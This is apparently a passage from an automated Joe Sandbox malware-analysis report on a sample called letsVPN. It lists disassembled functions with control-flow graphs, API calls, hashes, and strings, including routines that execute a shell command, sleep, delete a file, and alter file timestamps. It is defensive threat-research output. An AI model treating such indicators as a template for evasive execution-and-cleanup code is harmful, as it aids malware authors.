606->567 615 180024976-180024979 606->615 608->601 619 18002489a call 180027804 608->619 616 18002499a-18002499c 611->616 617 180024aa0-180024aa7 611->617 621 180024a74-180024a83 call 1800183b4 612->621 622 180024981-180024985 612->622 615->611 624 18002497b-18002497f 615->624 616->567 625 1800249a2-1800249a9 616->625 626 180024aad-180024ac7 call 180017010 617->626 619->601 621->611 637 180024a89-180024a99 call 1800183b4 621->637 622->567 622->611 623->561 624->622 632 1800249ae-1800249bd call 1800183b4 624->632 625->626 626->588 648 180024acd-180024ad3 626->648 627->582 665 180024bdc 628->665 635 180024a13-180024a1c 629->635 636 1800249f4-1800249f7 629->636 632->611 653 1800249bf-1800249cf call 1800183b4 632->653 638 180024a38-180024a3d 635->638 639 180024a1e-180024a33 call 180016e44 call 180015dc8 635->639 636->637 643 1800249fd-180024a04 636->643 637->567 657 180024a9b 637->657 638->637 647 180024a3f-180024a50 call 1800183b4 638->647 639->582 643->635 650 180024a06-180024a0e 643->650 647->588 664 180024a56-180024a5a 647->664 648->626 655 180024ad5 648->655 650->573 653->588 653->604 655->567 657->588 664->567 665->665
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 51f9b2731b5c0c3c81ca969c26c7ffe3da710bf57b20caf7dcc85b9a83dc375f
                                                                                                                                                                                                    • Instruction ID: 2bc004255d4dc64879280be8e809554ba150f91c78f1042ec411c1203a364a17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51f9b2731b5c0c3c81ca969c26c7ffe3da710bf57b20caf7dcc85b9a83dc375f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE1C633B10A5846FBA7CA78C4943EC27A1A749BE8F14C215FE2A5B7D5CE78C649C701
                                                                                                                                                                                                    Function 0000000180006B28 Relevance: 25.0, APIs: 8, Strings: 6, Instructions: 451stringsleepfileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 666 180006b28-180006b97 call 1800111b0 call 180003948 671 180006b99 666->671 672 180006b9c-180006bd4 call 180002f78 wsprintfW 666->672 671->672 675 180006bd6-180006bda call 18000eaf0 672->675 676 180006bdf-180006bf4 672->676 675->676 678 180006bf6-180006bfa call 18000eaf0 676->678 679 180006bff-180007044 SHGetSpecialFolderPathW lstrcatW * 3 call 1800103cc call 180005638 call 1800018e4 call 1800016d0 * 5 676->679 678->679 697 180007046-18000704a call 18000eaf0 679->697 698 18000704f-180007064 679->698 697->698 700 180007066-18000706a call 18000eaf0 698->700 701 18000706f-18000707f 698->701 700->701 702 180007081-180007085 call 18000eaf0 701->702 703 18000708a-18000709a 701->703 702->703 706 1800070a5-1800070b5 703->706 707 18000709c-1800070a0 call 18000eaf0 703->707 709 1800070b7-1800070bb call 18000eaf0 706->709 710 1800070c0-18000714f call 1800018e4 call 1800016d0 * 5 706->710 707->706 709->710 724 180007151-180007158 call 18000eaf0 710->724 725 18000715d-180007179 710->725 724->725 727 180007187-1800071a3 725->727 728 18000717b-180007182 call 18000eaf0 725->728 730 1800071b1-1800071ca 727->730 731 1800071a5-1800071ac call 18000eaf0 727->731 728->727 733 1800071d5-1800071e5 730->733 734 1800071cc-1800071d0 call 18000eaf0 730->734 731->730 735 1800071e7-1800071eb call 18000eaf0 733->735 736 1800071f0-180007273 call 1800018e4 call 1800016d0 * 5 733->736 734->733 735->736 751 180007275-180007279 call 18000eaf0 736->751 752 18000727e-18000728e 736->752 751->752 754 180007299-1800072a9 752->754 755 180007290-180007294 call 18000eaf0 752->755 757 1800072b4-1800072c4 754->757 758 1800072ab-1800072af call 18000eaf0 754->758 755->754 760 1800072c6-1800072ca call 18000eaf0 757->760 761 1800072cf-1800072df 757->761 758->757 760->761 763 1800072e1-1800072e5 call 18000eaf0 761->763 764 1800072ea-180007329 call 180001748 call 18000167c 761->764 763->764 770 180007334-180007402 call 1800084d0 call 1800111b0 ShellExecuteExW Sleep DeleteFileW 764->770 771 18000732b-18000732f call 18000eaf0 764->771 777 180007404-18000740b call 18000eaf0 770->777 778 180007410-18000742c 770->778 771->770 777->778 780 18000743a-180007456 778->780 781 18000742e-180007435 call 18000eaf0 778->781 782 180007464-180007480 780->782 783 180007458-18000745f call 18000eaf0 780->783 781->780 786 180007482-180007489 call 18000eaf0 782->786 787 18000748e-1800074aa 782->787 783->782 786->787 789 1800074b8-1800074e7 call 180012200 787->789 790 1800074ac-1800074b3 call 18000eaf0 787->790 790->789
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrcat$DeleteExecuteFileFolderPathShellSleepSpecialwsprintf
                                                                                                                                                                                                    • String ID: /F $ /d 0$ /t $ /v $@$p
                                                                                                                                                                                                    • API String ID: 2901320441-719673316
                                                                                                                                                                                                    • Opcode ID: e57dd66678158338e5c2a573c4aa2a2db4ed1e9dcfa8cee3a4322f6ea663ef52
                                                                                                                                                                                                    • Instruction ID: 651b5840f91052aa65d2ad8009e727a2fa45a5703b0bebf71695ec9b55f461a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e57dd66678158338e5c2a573c4aa2a2db4ed1e9dcfa8cee3a4322f6ea663ef52
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5420772211AC4DDE761DF61DC883CD37A5F74978CF40811AEA095BAAACFB58788C744
                                                                                                                                                                                                    Function 000000018000A40A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 951 18000a40a-18000a411 952 18000a413-18000a418 951->952 953 18000a41d-18000a421 951->953 954 18000a744-18000a76e call 180012200 952->954 955 18000a423-18000a426 call 18000cdd4 953->955 956 18000a42b-18000a435 953->956 955->956 956->952 957 18000a437-18000a43a 956->957 960 18000a44b-18000a451 957->960 961 18000a43c-18000a441 call 18000ceac 957->961 964 18000a443-18000a446 call 18000cf08 960->964 965 18000a453-18000a469 call 180009bbc 960->965 961->960 964->960 970 18000a4ab-18000a4b1 965->970 971 18000a46b-18000a46f 965->971 972 18000a4b7-18000a4c1 970->972 973 18000a5cb-18000a5cf 970->973 974 18000a725-18000a727 971->974 975 18000a475-18000a47a 971->975 976 18000a4da-18000a4dd 972->976 977 18000a5d1-18000a5d6 973->977 978 18000a5db-18000a5f7 call 18000cf88 973->978 974->954 979 18000a49c 975->979 980 18000a47c-18000a481 975->980 982 18000a4c3-18000a4c7 976->982 983 18000a4df-18000a4f1 call 18001285c 976->983 977->954 996 18000a608-18000a624 call 18000d334 978->996 997 18000a5f9-18000a601 call 18000eb24 978->997 981 18000a49e-18000a4a6 call 180009a9c 979->981 980->979 985 18000a483-18000a489 980->985 981->974 987 18000a4c9-18000a4cd 982->987 988 18000a4cf 982->988 999 18000a4f3-18000a4fa 983->999 1000 18000a4fc-18000a50e 983->1000 991 18000a493-18000a49a 985->991 992 18000a48b-18000a491 985->992 987->988 994 18000a4d3-18000a4d7 987->994 988->994 991->981 992->979 992->991 994->976 1009 18000a686 996->1009 1010 18000a626-18000a628 996->1010 997->996 1006 18000a53e-18000a56b wsprintfW 999->1006 1002 18000a514-18000a527 1000->1002 1003 18000a76f-18000a790 call 180012780 call 18000a794 1000->1003 1007 18000a529-18000a52d 1002->1007 1008 18000a56d-18000a58b wsprintfW 1002->1008 1011 18000a58d-18000a5c8 call 180009a9c CreateFileW 1006->1011 1007->1008 1013 18000a52f-18000a532 1007->1013 1008->1011 1018 18000a68b-18000a68f 1009->1018 1014 18000a658-18000a65d 1010->1014 1015 18000a62a 1010->1015 1011->973 1013->1006 1021 18000a534-18000a53c 1013->1021 1014->1018 1022 18000a62c-18000a643 call 18002a058 1015->1022 1023 18000a64d-18000a652 1015->1023 1019 18000a691-18000a694 call 18002a060 1018->1019 1020 18000a69a-18000a6a4 call 18000cdd4 1018->1020 1019->1020 1020->954 1021->1006 1021->1008 1033 18000a649-18000a64b 1022->1033 1029 18000a654-18000a656 1023->1029 1030 18000a666-18000a684 SetFileTime 1023->1030 1029->996 1029->1014 1030->1018 1033->1023 1035 18000a65f-18000a664 1033->1035 1035->1018
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %s%s$%s%s%s$:
                                                                                                                                                                                                    • API String ID: 0-3034790606
                                                                                                                                                                                                    • Opcode ID: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction ID: 14882d1e0d26957d55fa102c130c097a1d26e38a24c7715c8a635e70eca5937d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B816E36208A8986FBA6DB2494483EE33A0F74E7D4F84C112FA5A476D5DF75C75E8301
                                                                                                                                                                                                    Function 00000001800246DC Relevance: 13.6, APIs: 9, Instructions: 62fileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1051 1800246dc-1800246e8 1052 1800246ea-1800246f2 1051->1052 1053 18002472e-180024764 call 18002a030 call 180015d78 call 180015dc8 1051->1053 1052->1053 1054 1800246f4-18002472c call 180024290 1052->1054 1060 180024769-180024774 GetFileType 1053->1060 1067 180024bfb 1053->1067 1054->1053 1054->1060 1062 1800247c2-18002482f call 18001edc4 1060->1062 1071 180024835-180024838 1062->1071 1072 1800248bc-1800248bf 1062->1072 1070 180024bfd 1067->1070 1070->1070 1073 180024ad7 1071->1073 1075 18002483e-180024841 1071->1075 1072->1073 1074 1800248c5-1800248d3 1072->1074 1078 180024adb 1073->1078 1076 1800248e3-1800248ea 1074->1076 1077 1800248d5-1800248db 1074->1077 1075->1072 1079 180024843-180024859 call 1800183b4 1075->1079 1082 180024928 1076->1082 1083 1800248ec-1800248f9 1076->1083 1080 1800248e1 1077->1080 1081 1800248dd-1800248df 1077->1081 1084 180024ae1-180024b30 1078->1084 1097 180024874-18002488b call 18001f1d4 1079->1097 1098 180024868-1800248a2 call 180016e44 1079->1098 1080->1076 1081->1076 1086 18002492c-180024932 1082->1086 1087 180024915-180024920 1083->1087 1088 1800248fb-180024903 1083->1088 1089 180024b53-180024b5f 1084->1089 1090 180024b32-180024b36 1084->1090 1086->1073 1095 180024938-180024943 1086->1095 1087->1086 1093 180024922-180024926 1087->1093 1088->1093 1094 180024905-18002490d 1088->1094 1089->1067 1092 180024b65-180024b68 1089->1092 1090->1089 1096 180024b38-180024b4e 1090->1096 1092->1067 1099 180024b6e-180024bab call 18002a060 call 180024290 1092->1099 1093->1086 1094->1086 1101 18002490f-180024913 1094->1101 1095->1078 1103 180024949-180024958 1095->1103 1096->1089 1110 1800248a4-1800248b4 call 1800183b4 1097->1110 1111 18002488d-180024892 1097->1111 1098->1110 1136 180024be1-180024bf7 1099->1136 1137 180024bad-180024bd7 call 18002a030 call 180015d78 call 18001eca4 1099->1137 1101->1086 1107 180024a5c-180024a5f 1103->1107 1108 18002495e-180024963 1103->1108 1107->1078 1112 180024a61-180024a64 1107->1112 1113 1800249d5-1800249e9 call 18001f1d4 1108->1113 1114 180024965-180024967 1108->1114 1110->1098 1132 1800248b6 1110->1132 1111->1110 1117 180024894-180024898 1111->1117 1120 18002498b-180024994 1112->1120 1121 180024a6a-180024a6e 1112->1121 1113->1098 1138 1800249ef-1800249f2 1113->1138 1114->1078 1115 18002496d-180024970 1114->1115 1115->1078 1124 180024976-180024979 1115->1124 1117->1110 1128 18002489a call 180027804 1117->1128 1125 18002499a-18002499c 1120->1125 1126 180024aa0-180024aa7 1120->1126 1130 180024a74-180024a83 call 1800183b4 1121->1130 1131 180024981-180024985 1121->1131 1124->1120 1133 18002497b-18002497f 1124->1133 1125->1078 1134 1800249a2-1800249a9 1125->1134 1135 180024aad-180024ac7 call 180017010 1126->1135 1128->1110 1130->1120 1146 180024a89-180024a99 call 1800183b4 1130->1146 1131->1078 1131->1120 1132->1072 1133->1131 1141 1800249ae-1800249bd call 1800183b4 1133->1141 1134->1135 1135->1098 1157 180024acd-180024ad3 1135->1157 1136->1067 1174 180024bdc 1137->1174 1144 180024a13-180024a1c 1138->1144 1145 1800249f4-1800249f7 1138->1145 1141->1120 1162 1800249bf-1800249cf call 1800183b4 1141->1162 1147 180024a38-180024a3d 1144->1147 1148 180024a1e-180024a33 call 180016e44 call 180015dc8 1144->1148 1145->1146 1152 1800249fd-180024a04 1145->1152 1146->1078 1166 180024a9b 1146->1166 1147->1146 1156 180024a3f-180024a50 call 1800183b4 1147->1156 1148->1067 1152->1144 1159 180024a06-180024a0e 1152->1159 1156->1098 1173 180024a56-180024a5a 1156->1173 1157->1135 1164 180024ad5 1157->1164 1159->1084 1162->1098 1162->1113 1164->1078 1166->1098 1173->1078 1174->1174
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileHandleLast_dosmaperr_errno$AddressCloseModuleProcType__create
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4140100140-0
                                                                                                                                                                                                    • Opcode ID: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction ID: 21a8e73e1044da5ed91c5e9c3d813a1c520d1f5f3831f37e1cb40251bc97187f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69217137715A0886EB93DBA4E4953ED3360B78ABA8F508615F96A9B7D5CF38C5088700
                                                                                                                                                                                                    Function 00000001800084D0 Relevance: 12.1, APIs: 8, Instructions: 87fileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1175 1800084d0-1800084ed 1176 1800084f3-1800084f6 1175->1176 1177 180008614 1175->1177 1176->1177 1179 1800084fc-18000850e PathFileExistsW 1176->1179 1178 180008616-18000862a 1177->1178 1180 180008542-18000856c CreateFileW 1179->1180 1181 180008510-180008537 CreateFileW 1179->1181 1180->1177 1183 180008572-18000859e call 18002a0c0 1180->1183 1181->1180 1182 180008539-18000853c call 18002a060 1181->1182 1182->1180 1183->1177 1187 1800085a0-1800085f9 call 18000decc call 18002a0c0 call 1800113f0 * 2 call 18002a058 1183->1187 1197 1800085ff-180008612 call 180011098 call 18002a060 1187->1197 1197->1178
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$ByteCharCloseCreateHandleMultiWide$ExistsPathWrite
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3442908436-0
                                                                                                                                                                                                    • Opcode ID: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction ID: bc84bb0ade42bd10d81e598d42a7d6411edb22724f2ff8f25fe5d380946b77e8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53316072614B4847FBA5DF15A44879A7791F79DBF4F048324BAAA07AD5CF7CC2088B04
                                                                                                                                                                                                    Function 0000000180012545 Relevance: 12.0, APIs: 8, Instructions: 46memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1202 180012545-180012556 1203 1800125d4-1800125e4 call 18001693c call 180015dc8 1202->1203 1204 180012558-180012560 1202->1204 1218 1800125e6-1800125f5 1203->1218 1206 180012564-18001256e 1204->1206 1208 180012590-180012595 call 18002a148 1206->1208 1209 180012570-180012589 call 180019254 call 1800192c8 call 180010b34 1206->1209 1213 18001259b-1800125a1 1208->1213 1209->1208 1216 1800125a3-1800125a9 1213->1216 1217 1800125cf-1800125d2 1213->1217 1220 1800125b9-1800125be call 180015dc8 1216->1220 1221 1800125ab-1800125b5 call 18001693c 1216->1221 1217->1218 1229 1800125c4-1800125c9 call 180015dc8 1220->1229 1221->1229 1230 1800125b7 1221->1230 1229->1217 1230->1206
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_callnewh$AllocHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2989141601-0
                                                                                                                                                                                                    • Opcode ID: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction ID: 2ba802d8fde8188c932a9ee185128103f4f97c31fd93188f9c8e6f85ebd482bd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF118230601F8C86FBE7A7A1A5917E86651AB8CBF0F04C620BA15067C2EE7886988710
                                                                                                                                                                                                    Function 00000001800187BF Relevance: 10.5, APIs: 7, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$CloseCodeExitHandleObjectProcessSingleWait_dosmaperr_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4283748043-0
                                                                                                                                                                                                    • Opcode ID: c95c02961cc194df7dfc83e827ea4e74a839e4b131e4c3f36add82e81babb2aa
                                                                                                                                                                                                    • Instruction ID: 88746e5f5ece916c4c2f1eca854d168e225486084e5c7e04883772d133e6b958
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c95c02961cc194df7dfc83e827ea4e74a839e4b131e4c3f36add82e81babb2aa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A014C31609A4883FBE36F25A5943AC6361AF4DBF0F90C214FA66066D4DF28C6499701
                                                                                                                                                                                                    Function 0000000180009ACA Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1255 180009aca-180009ad3 GetFileAttributesW 1256 180009ad5-180009ada CreateDirectoryW 1255->1256 1257 180009ae0-180009ae6 1255->1257 1256->1257 1258 180009b91-180009bb3 call 180012200 1257->1258 1259 180009aec-180009aef 1257->1259 1261 180009af2-180009b0b 1259->1261 1265 180009b0d-180009b10 1261->1265 1266 180009b12-180009b36 call 180010400 1265->1266 1267 180009b50-180009b58 1265->1267 1266->1267 1274 180009bb4 call 180012780 1266->1274 1268 180009b67-180009b82 call 180012830 GetFileAttributesW 1267->1268 1269 180009b5a-180009b62 call 18001285c 1267->1269 1268->1258 1276 180009b84-180009b8b CreateDirectoryW 1268->1276 1269->1268 1276->1258
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesCreateDirectoryFile$wcscatwcscpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4269979241-0
                                                                                                                                                                                                    • Opcode ID: 69e89a8265683c7f324991ffcd15ebdcd80ba550b9a02bc2d334df5dfaf67a94
                                                                                                                                                                                                    • Instruction ID: 902337c518d8cfbd194fdc28dbe7ec504bcb61d07c762cc6d237d0d59feab74b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69e89a8265683c7f324991ffcd15ebdcd80ba550b9a02bc2d334df5dfaf67a94
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8221A47120594841FEA2DB55A5A43FA7351BB8DBE4F848221FF9A429D5DF2CC74AC304
                                                                                                                                                                                                    Function 0000000180009A9C Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1278 180009a9c-180009ae6 1280 180009b91-180009bb3 call 180012200 1278->1280 1281 180009aec-180009aef 1278->1281 1283 180009af2-180009b0b 1281->1283 1287 180009b0d-180009b10 1283->1287 1288 180009b12-180009b36 call 180010400 1287->1288 1289 180009b50-180009b58 1287->1289 1288->1289 1296 180009bb4 call 180012780 1288->1296 1290 180009b67-180009b82 call 180012830 GetFileAttributesW 1289->1290 1291 180009b5a-180009b62 call 18001285c 1289->1291 1290->1280 1298 180009b84-180009b8b CreateDirectoryW 1290->1298 1291->1290 1298->1280
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b746bd5d8d546c3e46b26d5fffc3ec12d2bafe3fd99919c886d71bc6d71907c3
                                                                                                                                                                                                    • Instruction ID: bb4cf8d93bbf9cc6e2ba9141ee1deb4e8242243cebc2ec3432d515e8a9c1d0ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b746bd5d8d546c3e46b26d5fffc3ec12d2bafe3fd99919c886d71bc6d71907c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A21A475205A8841FEA2DB51A5643FAB351BB8CBD8F448121FB8D06AD9EF2CC75AC704
                                                                                                                                                                                                    Function 000000018001CB6C Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
